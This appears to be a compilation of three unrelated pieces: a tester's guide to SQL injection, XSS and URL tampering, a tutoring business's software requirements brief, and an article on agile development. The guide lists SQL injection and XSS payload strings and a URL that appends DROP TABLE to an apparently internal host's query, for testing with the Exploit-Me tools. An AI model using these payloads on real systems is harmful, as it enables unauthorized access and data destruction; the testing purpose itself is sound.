Injection Attacks

Table of Contents

1        Introduction. 4

1.1 What is Attack. 4

1.2 Types of Injection Attacks. 4

2        SQL Injection Attacks. 5

2.1 Introduction. 5

2.2 Examples of SQL Injection Attacks. 5

3        Cross Site Scripting (XSS) Attacks. 6

3.1 Introduction. 6

3.2 Examples of XSS Attacks. 6

4        URL Manipulation/Tempering Attacks. 7

4.1 Introduction. 7

4.2 URL Manipulation. 7

4.3 SQL Injection Attacks in URL. 7

4.4 XSS Attacks in URL. 8

5        Tools. 9

5.1 Introduction. 9

5.2 Functioning of tool 11

5.3 How to customized Quires in Tool library. 14

1          Introduction

1.1  What is Injection Attack

Injection Attack is a type of security exploit in which the attacker adds a code to a Web form input box to gain access to resources or make changes to data. It is a request for some action to be performed on a database or in code. Typically, on a Web form for user authentication, when a user enters their name and password into the text boxes provided for them, those values are inserted into a query. If the values entered are found as expected, the user is allowed access; if they aren't found, access is denied.

1.2 Types of Injection Attacks

Weak input validation is a common vulnerability that could allow your application to be exploited by a number of injection attacks. The following are common types of attacks that exploit weak or missing input validation:

·         SQL Injection Attacks

·         Cross Site Scripting (XSS)

·         URL Rewriting/Tempering

2          SQL Injection Attacks

2.1  Introduction

“This is the process of inserting SQL statements through the web application user interface into some query that is then executed by the server”.

SQL injection attacks are very critical as attacker can get vital information from server database. To check SQL injection entry points into your web application, find out code from your code base where direct SQL queries are executed on database by accepting some user inputs.

If user input data is crafted in SQL queries to query the database, attacker can inject SQL statements or part of SQL statements as user inputs to extract vital information from database. Even if attacker is successful to crash the application, from the SQL query error shown on browser, attacker can get the information they are looking for. Special characters from user inputs should be handled/escaped properly in such cases.    

2.2  Examples of SQL Injection Attacks

Followings are the some examples of SQL Injection Attacks:

Attack String

1 OR 1=1

1' OR '1'='1

1'1

1 EXEC XP_

1 AND 1=1

1' AND 1=(SELECT COUNT(*) FROM tablenames); --

1 AND USER_NAME() = 'dbo'

'; DESC users; --

1'1

1' AND non_existant_table = '1

' OR username IS NOT NULL OR username = '

1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116

1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --

1 UNI/**/ON SELECT ALL FROM WHERE

%31%27%20%4F%52%20%27%31%27%3D%27%31

1' OR '1'='1

&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49

3          Cross Site Scripting (XSS) Attacks

3.1 Introduction

When a user inserts HTML/ client-side script in the user interface of a web application and this insertion is visible to other users, it is called XSS.

The tester should additionally check the web application for XSS (Cross site scripting). Any HTML e.g. <HTML> or any script e.g. <SCRIPT> should not be accepted by the application. If it is, the application can be prone to an attack by Cross Site Scripting.

Attacker can use this method to execute malicious script or URL on victim’s browser. Using cross-site scripting, attacker can use scripts like JavaScript to steal user cookies and information stored in the cookies.

Many web applications get some user information and pass this information in some variables from different pages.

E.g.: http://www.examplesite.com/index.php?userid=123&query=xyz

Attacker can easily pass some malicious input or <script> as a ‘&query’ parameter which can explore important user/server data on browser.

3.2 Examples of XSS Attacks

Followings are the some examples of XSS Attacks:

Attack String

<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">

<SCRIPT>document.vulnerable=true;</SCRIPT>

<IMG SRC="jav ascript:document.vulnerable=true;">

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>

<<SCRIPT>document.vulnerable=true;//<</SCRIPT>

<iframe src="javascript:document.vulnerable=true; <

</TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>

<BODY BACKGROUND="javascript:document.vulnerable=true;">

<BGSOUND SRC="javascript:document.vulnerable=true;">

¼script¾document.vulnerable=true;¼/script¾

<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET>

<style><!--</style><script>document.vulnerable=true;//--></script>

<![CDATA[<!--]]<script>document.vulnerable=true;//--></script>

<xml src="javascript:document.vulnerable=true;">

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->

4          URL Manipulation/Tempering Attacks

4.1 Introduction

URL manipulation, also called URL rewriting, is the process of altering the parameters in a URL (Uniform Resource Locator). Changing some information in the URL may sometimes lead to unintended behavior by the server.

The tester should check if the application passes important information in the query string. This happens when the application uses the HTTP GET method to pass information between the client and the server. The information is passed in parameters in the query string. The tester can modify a parameter value in the query string to check if the server accepts it.

Via HTTP GET request user information is passed to server for authentication or fetching data. Attacker can manipulate every input variable passed from this GET request to server in order to get the required information or to corrupt the data. In such conditions any unusual behavior by application or web server is the doorway for the attacker to get into the application.

4.2 URL Manipulation

By manipulating certain parts of a URL, a hacker can get a web server to deliver web pages he is not supposed to have access to.

On dynamic websites, parameters are mostly passed via the URL as follows:

http://target/forum/?cat=2

The data present in the URL are automatically created by the site and when navigating normally, a user simply clicks on the links proposed by the website. If a user manually modifies the parameter, he can try different values, for example:

http://target/forum/?cat=6

The hacker may potentially obtain access to an area that is usually protected.

In addition, the hacker can get the site to process an unexpected case, for example:

http://target/forum/?cat=***********

In the above example, if the site's designer has not anticipated the case where the data is not a number, the site may enter an unexpected state and reveal information in an error message.

4.3 SQL Injection Attacks in URL

An attacker may abuse the fact that the UserID parameter is passed to the database without sufficient validation. The attacker can manipulate the parameter's value to build malicious SQL statements. For example, setting the value "123 OR 1=1" to the ProductID variable results in the following URL:

http://bwin5074:81/Portal/PortalMain/Default.aspx?Forms=1&tz=330&ln=en&lnf=en-US&sid=123 or 1=1

In this example the semicolon is used to pass the database server multiple statements in a single execution. The second statement is "DROP TABLE ECF.PERMISSION " which may causes SQL Server to delete the entire table.

http://bwin5074:81/Portal/PortalMain/Default.aspx?Forms=1;DROP+TABLE+ECF.PERMISSION

4.4 XSS Attacks in URL

By adding some text in <HTML> tag in URL application crashes. Below is the example:

http://bwin5074:81/Portal/FormsLogin/Default.aspx?forms=<script>&tz=330&ln=en&lnf=en-US

5          Tools

5.1 Introduction

Exploit-Me is a suite (add-ons) of Firefox web application security testing tools designed to be lightweight and easy to use. It includes:

·         SQL Inject-Me

·         XSS-Me

Exploit-Me can be downloaded from following URL: http://labs.securitycompass.com/index.php/exploit-me/

§  SQL Inject-Me: SQL Injection vulnerabilities can cause a lot of damage to a web application. A malicious user can possibly view records, delete records, drop tables or gain access to your server. SQL Inject-Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities. SQL Inject-Me can easily be download as Add-ons in Mozilla Firefox. After installation it can be viewed in Tools tab as shown below:

When we click upon Open SQL Inject Me sidebar, it will open the SQL Injection tool list in left side bar. As shown below:

§  XSS-Me: Cross-Site Scripting (XSS) is a common flaw found web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities.

XSS-Me can easily be download as Add-ons in Mozilla Firefox. After installation it can be viewed in Tools tab as shown below:

When we click upon Open XSS Me sidebar, it will open the XSS tool list in left side bar. As shown below:

5.2 Functioning of tool

Step 1: Open the application in Mozilla Firefox. Now from Tools open the SQL Injection-Me tool. As shown below:

On Sidebar, each tab represents a form on the page and lists all the fields. For example it is displaying, Username, Password and Login button:

 

Step 2: If we want to insert any SQL Query Injection in any text box fields (Username or Password) we can select the option from left navigation.

1.       For example if we want to insert SQL Query Injection for Username text field. Select the checkbox and click SQL query from ‘txtLogin’ drop down. It will display selected SQL Query in “Username” textbox of the application as shown below here we are selecting query “1' OR '1'='1”

Now click upon Login button on the application and check the result. Same we can select different SQL Quires from drop down and check the results.

2.       For example if we select query “&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49” from dropdown and click on Login.

Result: Following error will come:

Step3: If you want to execute different quires simultaneously and want to check the results by tool, you need to select the checkboxes from left navigation and click on “Execute” button. It will display results. User can also select “Test all form with all attacks” option, it will execute all selected quires on all forms of application.

It will display results as follows. Error will display in “Red” color and Queries which will execute successfully will display in “Green” color.

5.3 How to customized Quires in Tool library

Step1: Go to “Tool” menu, select SQL Inject me, and then go to options.

Step2:  It will open a pop up window from where user can “Add”, “Remove” SQL quires.

BASIC OVERVIEW OF REQUIREMENTS AND CURRENT SYSTEMS

THESE SYSTEMS WHOLLY COMPRISE MY BUSINESS OPERATION CURRENTLY

 

BASIC OVERVIEW OF REQUIREMENTS AND CURRENT SYSTEMS

I would like the software to manage all my data and perform every operation that currently exists in my business processes.

Mostly i want everything to work as it does now but

·        To be integrated into one whole software solution which is online

·        enable tutors/clients to enter and view data online at will instead of having to make phone enquiries to view/change their data...i.e. clients can log in, view their tutor’s contact details, view past progress reports and account statements; view details of their last payment etc.... tutors can log in, complete reports, create invoices for their hours...

·        enable a better automation of tasks, especially if-then processes which are dependent on an amount of time passing e.g. if client has had > 10 hrs of tutoring then send a “follow up” email.....

·        enable access to the system from any internet enabled computer and have different access rights for various staff

The main systems:

1.     SALES SYSTEM

CURRENTLY: this system exists as a separate MS Excel file. VBA forms and macros manage this volume of data and keep track of prospective clients as they move through the sales process.

·        Stores prospective client enquiries and manages sales data; clients enquire by email, phone, online form

·        Needs to operate almost exactly as it currently does... including looking up client locations via the MapQuest API currently being used to see if there are tutors in the vicinity for a given subject and grade level

·        This system is very simple; it queries data and has numerous auto- templates for SMS and email messages

·        It also has basic stats for how many enquiries are converted to sales etc ...very simple calculations

·        Probably the trickiest part of this program is tracking the conversion from enquiry to
“new client” and attributing the sale to a corresponding sales person AND removing the attributed sale if the client cancels before their first lesson

2.     Recruitment Management System

General Recruitment Concepts ·         Because tutors are mostly uni students and their timetable are subject to change regularly etc many tutors don’t stay for very long due to lack of availability. This means recruitment needs to be constant and in high volume. For this to be feasible it needs to be very efficient.

The Recruitment Process 1.      Applicants submit their resume through an online form 2.      Successful applicants submit a thorough profile application through an online form 3.      Successful applicants are invited to book an interview using online booking software 4.      Applicants attend an online interview using software not dissimilar to Skype 5.      Successful applicants are called and offered a position, sent a contract 6.      Once the contract is received they are sent the training manual and training manual test 7.      Once they send back the test they are Entered into our system and sent an email with welcome documents ·         Now they can be considered for new students in their areas and are entered into the regular BMS

The Recruitment Management System ·         This is a web based software package built by an outsourcer to my exact specifications. It allows for the recruitment process above to be done super efficiently. ·         Resume and profile applications go directly into this software package ·         It basically takes only the click of one button to move an applicant from one step in the above process to the next

·        This works perfectly in its current form; perhaps a couple new queries would be useful to meet new needs

·        Really it just needs to be integrated with the rest of the system so that

                                                              i.      New tutors can be entered into the regular BMS system with a click directly from RMS

                                                            ii.      Tutor resumes and profile applications can be accessed from the individual tutor record within the regular database (BMS)..

o   This system completely manages the whole recruitment process. Captures resumes, organises interviews, sends contracts etc

3.     CEP Program – Training Module Software

Basic concept/Purpose ·         There needs to be a simple way to remain in communication with tutors otherwise there is no relationship between EMT and the tutors besides monthly invoices ·         It would be great to give ongoing bits of training to tutors to keep them somewhat engaged and improve their skill ·         Some tutors take their jobs seriously whereas others are very casual about it. Most tutors are Gen-Y ·         With an ever growing number of tutors (currently around 220 actively working) if there is going to be regular communication, it needs to be automated as much as possible. ·         There also needs to be a way to efficiently collect standardised invoices from tutors

Overview ·         The CEP works only with tutors that currently have active students ·         It sends a “learning module” or article to tutors on a fortnightly basis ·         Each article comes with an online form that the tutors must complete – the form asks ·         If tutors are too busy they can elect online “Can’t complete CEP this fortnight” ·         There is a part of this program that collects invoices from tutors through an online form. o   The online form collects Monthly Progress reports and Invoices from tutors o   The software form then renames the files to a  standardised name series which is compatible with the BMS for end of month processing o   NB: with the new software there will be a separate process to submit tutor invoices – i am just trying to show how the business works.

Functionality ·         This system is 100% completely automated ·         CEP and invoices are submitted via online forms ·         The only human involvement is to overview the submitted CEP forms i.e. reply to any tutors who wanted some help or advice. \ ·         The system automatically sends SMS and email reminders to tutors when they need to submit any documents o   It also sends auto reminders when tutors are late with their correspondence ·         If a tutor has not submitted their CEP form for 3 fortnights in a row, they will not be able to submit an invoice ·         This system is an online system written by an outsourced programmer according to my own specifications. It is completely separate to the BMS. ·         We also need to manage tutor’s status i.e. o   When they have active students, the CEP should run and they should submit invoices and be sent reminders o   When they don’t have active students they don’t need to complete the CEP forms or submit invoices ·         In order to manage the tutor’s status a CEP-Excel software module was created. It allows for communication between the BMS VBA program  and the CEP program. This allows for a situation where human involvement is not necessary for managing the CEP or Invoice Submission process.

·        This works perfectly as it currently is – it would only need to be integrated

·        The current integration has a few tricky IF-THEN rules which determine when to set a tutor to active in the CEP system, when to immediately deactivate them and when to set them as “deactivating” for another month....all these rules are based on testing whether or not a tutor has “active” students and if not then when their last month of work would be/would have been

                                                              i.      In a nutshell, this system automates the distribution of training modules to tutors and reminds them to submit invoices.

4.     BUSINESS MANAGEMENT SYSTEM

This is the excel spreadsheet that holds all our data currently. A VBA form with various functions helps to manage this. It is what i have instead of a database at the moment. There are 2 main data workbooks; one for storing tutor details and one for storing client details. There is also a new workbook for each month to store client details that may change on a monthly basis such as their tutor, payments received; hourly rate etc... I don’t imagine it would be too difficult to model a real database on this data.

The business management system is itself comprised of numerous main functions/processes/interfaces

a)     ACCOUNT START

a.     Monitor a client’s account after they are entered as a new client for example: see which new clients need to be assigned a tutor; assign an original tutor to them; if a tutor hasn’t confirmed contact with the client send them and email/sms; if the client has had >10hrs tuition send an automated follow up email; after 20hrs tuition send an email requesting testimonials etc; also has incorporated the mapping software to see which tutors are suitable/close

·  This is mostly just a set of queries and set of automated email/sms responses

b)    TUTOR SWAP

a.     Similar to Account Start; see which clients need to be assigned a replacement tutor; this is the process by which a replacement tutor is allocated to a client; again if the tutor hasn’t confirmed contact with client after 2 days of being assigned they are sent an email; after 10hr the client is sent a follow up email etc; also has incorporated the mapping software to see which tutors are suitable/close

·  This is mostly just a set of queries and set of automated email/sms responses

c)     ACCOUNT MANAGEMENT

a.     This is the system by which i manage who owes us how much money; who has not paid any money to their account for 1 month-2months-3months etc; plus a few other query types are available

·  This is mostly just a set of queries and set of automated email/sms responses

d)    STATISTICS

a.     This is a page which calculates various metrics such as average hours per student; average rate per hour etc etc . . . really this is just aggreagating information and manipulating it. There are a few tricky formulas here but nothing genuinely complex.

e)     EMAIL PROGRAM

a.     This program allows me to send a template email only to those clients or tutors which meet certain conditions. For example an email to clients who are “active”; an email to senior tutors who have had more than 100hours of experience etc

f)      INVOICING AND BILLING

·        This is by far the most complicated system i have created for the business and is probably the most convoluted in terms of processes, conditions, rules etc BUT it is probably less complicated than the CEP Training Module Software.

1.     A tutor’s hours are entered for each student; the software stores those hours in the tutor records and creates a pdf statement which is emailed to clients. Complications arise because there may/may not have been other tutors who worked with this student during the month and we need their invoices for this client account too; also the software tests if the tutor submitted a progress report which is mandatory under certain conditions and if they did not then they are sent a reminder and the account statement is not yet sent etc...

·        With the new software this will all need to happen online such that tutors can themselves enter their hours for each student each month etc...

Expected Challenges; Unanswered Questions and Concerns:

1.     Data entry from forms. Currently i have custom built forms such as the contact form which clients use to enquire from our website – i would like this data to be auto captured into the “Sales Management” part of the system. I am also concerned about this because in the near future i will have a design company build me a new site and i am not sure how to make it so that the new forms will be compatible with this system that we are going to build?

2.     Payments. I need some sort of integrated ecommerce component. Clients need to be able to log in to their account – see what they owe and make a payment. The payment should automatically be added to their account. I am not sure what solutions exist for this? There is Eway and SecurePay which i have been considering – they have APIs.

                                                              i.      Also, the way i pay my tutors is direct into their bank account using their bank account details – there is a way to semi-automate this by creating ABA files so i don’t have to do it manually for each tutor as i do now. It definitely is possible, have a look at http://www.bluechilli.com/software/apps/cemtex-aba-file/aba-file-format.html . ABA files are simple text documents with very specific formatting.

3.     Implementation. How will we convert from me using the old system to using the new system? My business is at a size where i have new clients, new tutors, payments etc on a  daily basis. ALSO, how will we enter the existing data into the new system? There is a lot of it – too much to do by hand, and i need that data to be readily available.

4.     Security/Password protection etc

                                                              i.      Currently i use a program called Website Access Manager to manage which users have access to log in to the tutor admin section etc... this will not suffice for our project. Each tutor and each client needs to have access not only to generic forms as now but also to their specific information. As such i believe that a new system/process will need to be created for assigning access priviledges to users – also this needs to be automated somewhat and integrated, for example; when a tutor is “hired” a password and username is automatically created for them and they are assigned standard access rights to their data as well as generic resources which are available to all tutors such as practice maths worksheets

                                                            ii.      Also, there needs to be a way to manage access rights to this software itself for my employees. i.e. the sales staff should only have access to the sales program; only i should have access to the statistics etc

                                                          iii.      How will we convert the existing users and passwords to the new system?

5.     General risks:

                                                              i.      Once the software is up and running my WHOLE business will depend on it. Should you fall ill or your company fall apart, there will be no way for errors to be corrected or for new functionality to be installed. This is a major concern for me. I think we can possibly handle this by creating extremely thorough documentation so that in such an event another coder or company of coders could pick up the pieces?

                                                      ii.      Surely with such a large project there will be many tweaks and “extras” required over the next few months after installation. I don’t think these “extras” are predictable and i would like to organise some sort of retainer payment system whereby on top of the quoted price for the project, i will pay you some sort of maintenance fee? The business is growing and i have high ambitions – changes are likely to be regular.

Agile Software Development

Introduction

This article presents Agile Software development - an alternative approach to software project management that is quite different from the traditional models. It promises to bring agility to your software development processes and promotes a new, evolutionary change in how software projects are managed. The article aims at providing its readers a broad level overview on this latest methodology.

What is Agile Software Development?

Agile is basically an alternative approach to the software project management that is quite different from the traditional waterfall model that is mostly practiced by software farms globally. We are now coming across various hot methods like Crystal, Extreme Programming (XP), Scrum, Adaptive Software Development, etc. All of these team up to form the agile software development. Agility is important not only for the software development methodologies, but also concerning any organization. Agility is the keyword for survival of the organizations in the near future.

Agile methods are based on real time communication between the programming team and its customers. The customers normally include project managers, analysts, and actual customers. All of them communicate face-to-face without putting much emphasis on written documentations. This is a key emphasis area for Agile Development and is a point of criticism. The team resides in an arrangement or enclosure wherein they can freely communicate with each other. The enclosure also may contain Quality Assurance Engineers, Graphics Designers and respective managers.

Most of the agile software development methods call for minimizing the risk by developing software in short modular boxes called iterations. Each of these iterations is by itself a mini software project and follows all the standard phases of the software project life cycle, such as project planning, requirement analysis, system design, code generation, testing and documentation. Completion of any iteration is followed by review of the project priorities by the project team.

Looking back in time

Agile development is an effect of the negative reaction against the commonly practiced software development models of the olden days, namely the waterfall model. It started becoming a popular and practical mode of development approach since the mid 1990's. Agile development came into existence due to the fact that theoretical approach of the waterfall model came out to be quite different from the practical methodologies followed by the developers to successfully design and develop any software solution. During initial days of programming, agile development methods have been referred to as “light weight” methods. In the year 2001 the agile community adopted the name “agile methods.” In the past there have been several agile development methods available to the software industry and each of these are having its own significance and importance to its followers and the community is consistently working towards effective utilization of these methods by the software development world.

The Agile Development Standards

Agile development is based on some standards outlined in this section.

Continuous involvement of customer - The need for involvement of an end user throughout the project lifecycle in agile development is very important. An end user has to be made available throughout the project development lifecycle and interact with the developers and help them achieve their project goals. They also need to verbally communicate on a regular basis to make the project lively and free of any bugs arising from misconceptions.

Team members should take important decisions - The project development team should possess enough power to take important decisions in collaboration with the end user (customer). The team members need not always wait for their higher authorities to take important decisions for taking the project ahead. This can be done when absolutely needed and can be avoided in general. The team members can very well take proper decisions in collaboration with the customer contacts that are in collaboration. They should, however, know to manage the customer’s expectations optimally.

Requirement analysis, a continuous process - In traditional models, the requirements are normally analyzed and fixed at the very initial level of the project lifecycle. Whatever the case may be, the emphasis is given to capture as much requirements as possible and to streamline the project scope. Any future changes are normally taken care of as a separate activity under “change request management.” Agile development works on a philosophy that is very much different from traditional software development methodologies.

Agile development methodology can address the evolving requirements over time. How? The time period for any project is kept fixed and the requirements are allowed to come in during the project lifecycle. Therefore, the project team and also the end user (the customer) need to include or remove any requirement keeping in mind the fixed time period. As a result, they may need to adjust this new work with some other comparable work within the project to put up this change.

Project requirements are visual and adequately drawn - Agile project requirements are drawn mostly at high level and are optimal and visual in nature. These requirements are mostly drawn bit by bit and help to develop the software for any specific feature or module. The visual representation of the requirements helps the agile developers to develop the solution closest to accuracy against its actual requirements. The requirements are sufficient in volume so as to provide that much input that is required for developing and testing the feature or module. This also enables reasonable efficiency. The objective behind this approach is to minimize the time taken for secondary activities in the project lifecycle that are always required to take ahead the project, but are certainly not a part of the end product or the solution.

Development produces small, incremental releases with iterations - In traditional software development methodologies the requirements for the whole software are collected at the very beginning, analyzed and then the software is developed with all its components and finally testing is done for the entire solution followed by its release. Agile software development approach supports a different cycle in terms of analysis, development and testing. The agile development projects are produced in separate pieces with small, “incremental releases.” Each of the features in the whole solution is separately treated and each of these features has its own three phases or steps (analysis, development, and testing). Once this feature is developed, the next feature is developed in succession following similar phases. Hence, the methodology enables doing each of these steps for each feature, with one feature at a time.

Recurrent product delivery – Agile development methodology supports recurrent delivery of any software product. It enables the breakup of the product into several modular features and delivers each feature incrementally on a regular basis.

Fullest completion of each feature – Agile development ensures fullest completion of each of its isolated features in terms of analysis, development, testing and release. Only then is the next feature or module in succession taken up. Care is taken to fully complete the functionalities within each feature (a mini project by itself) and then proceed on to the next feature that is another mini project and is in succession.

The 80/20 Rule – The law of distribution and the similarity in distribution curve amongst many things are defined in the Pareto’s law which is also known as the 80/20 rule. The law defines that 20% of the efforts put in can bring out 80% of results. The percentages may vary in various situations, but overall it means that the optimum amount of very important efforts can be identified and put in to bring out the bulk of the desired results. Hence, agile development emphasizes smart development wherein the team focuses on identifying the most important “20%” efforts to bring out the greater part of the results.

Continuous testing – Agile development encourages regular testing throughout the project lifecycle. It does not normally encourage a separate all new testing phase as such. The team does the unit testing exercise while developing the feature in phases. This not only ensures developing software of great quality, but also helps in the iterative, incremental releases of the software. The automated repeatable unit tests ensure that all the modular features are working as per expectations each time while creating a build. Regular builds are created and integration is also done as the development progresses. The primary objective for this approach is to ensure the software to be available in release condition at all times throughout the development cycle.

Collaborative and cooperative development approach – Agile development is strongly based on effective collaboration and cooperation amongst all its team members and also the end users (clients). Agile development focuses on keeping sleek but effective requirements and documentation that needs great collaboration at all times. Requirements need to be clarified in the right time. The team members and the end users should always be updated equally throughout the development to understand and appreciate the status of work in progress and the goals to be attained.

The Agile Development Methods

There are several agile methods currently available out of which few have gained greater importance in real-time practice. We will elaborate on a few of the popular agile methods, such as Scrum, Extreme Programming (XP), Crystal Clear, and DSDM (Dynamic Systems Development Methods). The other methods available are Agile Unified Process (AUP), Agile Modeling, Adaptive Software Development, FDD (Feature Driven Development), and Lean Software Development.

Let us take a look into a few commonly practiced agile methods in the following sections.

Scrum

Scrum development has its inception during 1986 and had the objective to present a highly iterative development methodology. The popular developers behind its successful initiation are Jeff Sutherland, Ken Schwaber, and Mike Beedle.

Scrum has its primary focus on the management part of the software development, dividing the whole development period into small iterations (of thirty days) called "sprints." This helps in administering the process better and also to control the development with daily team meetings. The engineering practices are less important in scrum development. The users, however, can merge the engineering practices of other popular agile methods with the project management aspects of scrum.

There is a Scrum Master who acts as a facilitator in scrum development and removes the obstacles that the team faces while attaining its sprint goals. The scrum development team is generally located in the same place, very well organized and encourages in extensive communication amongst each other regarding the project development aspects. These help in effective error-free progress and help them to attain the sprint goals. Scrum development takes its credit in addressing the fundamentally empirical challenges by appreciating the fact that any software problem is not defined fully during its inception and by maximizing the team’s efforts in rapid delivery and faster response to up-and-coming requirements.

Extreme Programming (XP)

Extreme Programming is said to be the most popular and important of the various agile development methodologies available to date. Extreme Programming owes its inception to the Smalltalk community during the late 1980's. The popular developers behind its successful initiation are Kent Beck and Ward Cunningham who also took up the task of enhancing the XP practices to provide a software development methodology that is people-centric and highly adaptive. Kent Beck authored the popular book on this methodology called "Extreme Programming Explained" which came out in the market during October 1999. The book still provides good references to the followers of this software development practice.

Extreme Programming recommends a set of daily practices for its team members. These practices can be seen as traditional software development practices taken to its highest productivity level. This effort helps in providing greater and faster response to the customers which is in contrast to the traditional methods. It also helps produce software solution of better quality. XP in line with other agile development methods also believes that requirements can come up during any time throughout the project lifecycle (instead of getting defined at the very beginning), and the team has to be highly adaptive to these up-and-coming requirements and make effective this realistic approach through energetic response.

Crystal Clear

One of the great exponents of agile community Alistair Cockburn developed the crystal family of software development approaches meant for teams of different sizes. All of these methods have similar features and properties. Important properties are Frequent Delivery, Reflective Improvement, and Close Communication. Crystal requires lesser discipline as compared to XP and has reduced chance of failure.

Crystal Clear is an important variant of crystal methodologies that is ideal for a team of about 6 to 8 developers located in the same venue and working on light weight systems. It has its emphasis on people and not on processes. Important properties of crystal clear are as follows.

·         Usable Code should be regularly delivered to the users

·         Improvements are insightful

·         Regular effective verbal communication between co-located team members

·         Ease of accessibility to the expert users

Dynamic Systems Development Methods (DSDM)

DSDM is a RAD (Rapid Application Development) based framework that follows a user driven, incremental approach in an iterative development for designing and developing software on time, satisfying all its business needs and strict budget. This agile methodology has its inception at the United Kingdom during the 1990's by DSDM Consortium (a non-profit organization). DSDM is an extension of RAD and it emphasizes information systems projects that are having steep deadlines and strict budgets. DSDM can be integrated to other agile methods in typical cases.

So, should we go agile?

Agile development and its usage belong to a specific group of people who clearly understand its significance. Agile development has its own set of drawbacks and may not be suitable for any type and size of software project, but can be successfully used for reasonably sized projects with a maximum team size of around 100 developers. However, agile development should be taken up by any organization in steps and can be started with a small project that can fall in line with the agile methods. Agile development is also a boon in providing customers who are so collaborative and act as stakeholders in a project development all through, along with the developers. Agile methods are still very young to draw the boundary conditions effectively for a software project. The decision for choosing agile methods should ideally go to the people primarily who are the best ones to decide whether they can suffice to the excellent collaborative project development. If not, it is better not to follow any agile methods as lack of the desire for adapting this development may ruin the project. However, with all its pros and cons, agile development is gaining immense popularity amongst organizations across the globe that believe in simplicity in designing and developing software with great and effective collaboration between the project stakeholders.

Essential-Software-Testing-a-Use-Case-Approach Free E-Book